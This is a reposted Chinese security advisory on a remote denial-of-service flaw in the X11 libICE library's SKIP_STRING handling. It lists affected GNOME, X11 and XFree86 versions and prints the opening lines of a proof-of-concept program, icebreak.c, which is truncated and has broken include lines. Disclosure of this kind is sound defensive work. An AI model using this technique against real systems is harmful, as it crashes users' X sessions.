对libICE 库拒绝服务攻击漏洞的深入解析

安全 漏洞
此文章主要讲述的是libICE 库拒绝服务攻击漏洞,以及对libICE 库拒绝服务攻击漏洞中所涉及到受影响系统的相关内容的描述。

此文章主要讲述的是libICE 库拒绝服务攻击漏洞,如果你对libICE 库拒绝服务攻击漏洞有兴趣的话,你就可以对以下的文章点击观看了,以下就是具体内容的描述,希望在你今后的学习中会有所帮助。

受影响系统:

 

GNOME Gnome 1.1

GNOME GNOME 1.0.x

Open Group X 11.0R6.x

Open Group X 11.0R6

Open Group X 11.0R5

XFree86 X11R6 4.0

XFree86 X11R6 3.3.6

- RedHat Linux 6.2 i386

XFree86 X11R6 3.3.5

- RedHat Linux 6.1 i386

XFree86 X11R6 3.3.4

XFree86 X11R6 3.3.3

不受影响系统:

GNOME Gnome 1.2

描述:

libICE是X11 window系统的一部分。由于在处理SKIP_STRING宏的时候存在一些问题,导致

任何使用libICE创建监听socket的应用程序都可以被远程攻击,使之停止服务。攻击者可以

给skip提供一个很大的值,使指针指向某些未初始化的内存区域,从而发生段访问错误。

GNOME中大量的使用了libICE,因此攻击者可能对正在运行GNOME的用户的X会话发动攻击。

<* 来源:Chris Evans *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/* icebreak.c - Chris Evans */

#include

#include

#include

int

main(int argc, const char* argv[])

{

unsigned char c;

unsigned int i;

unsigned short s;

char blankbuf[1000];

memset(blankbuf, '\0', sizeof(blankbuf));

/* Assume fd 1 is stdout */

/* ICE connection header */

/* First, pick an endian-ness */

/* Byte 1: Major opcode. Must be 0 */

c = 0;

write(1, &c, 1);

/* Byte 2: Minor opcode. Must be ICE_ByteOrder (1) */

以上的相关内容就是对libICE 库拒绝服务攻击漏洞的介绍,望你能有所收获。

 

libICE 库拒绝服务攻击漏洞

上述的相关内容就是对libICE 库拒绝服务攻击漏洞的描述,希望会给你带来一些帮助在此方面。

【编辑推荐】

  1. HP Tru64 UNIX ypserv拒绝服务攻击漏洞
  2. Sun Solaris内核补丁拒绝服务攻击漏洞
  3. Kerio个人防火墙工具拒绝服务攻击漏洞
  4. Cisco IPS包处理拒绝服务攻击漏洞
  5. Linux Kernel SCTP拒绝服务攻击漏洞
责任编辑:佚名 来源: 比特网
相关推荐

2009-07-12 16:50:08

2010-10-11 12:29:52

2010-10-09 14:59:30

2011-03-03 11:26:09

2010-09-14 16:54:16

2009-08-29 16:45:27

2009-10-22 11:28:38

2009-10-24 10:29:56

2010-09-29 14:27:06

2009-07-12 16:24:57

2024-09-25 15:32:23

2011-12-29 09:21:09

TomcatHashtable

2009-10-28 10:36:38

2009-11-02 12:25:30

2009-10-27 14:17:49

2015-08-21 10:11:25

2010-01-15 11:21:12

2012-08-20 10:15:44

2009-07-19 21:53:22

2011-08-11 09:02:58

点赞
收藏

51CTO技术栈公众号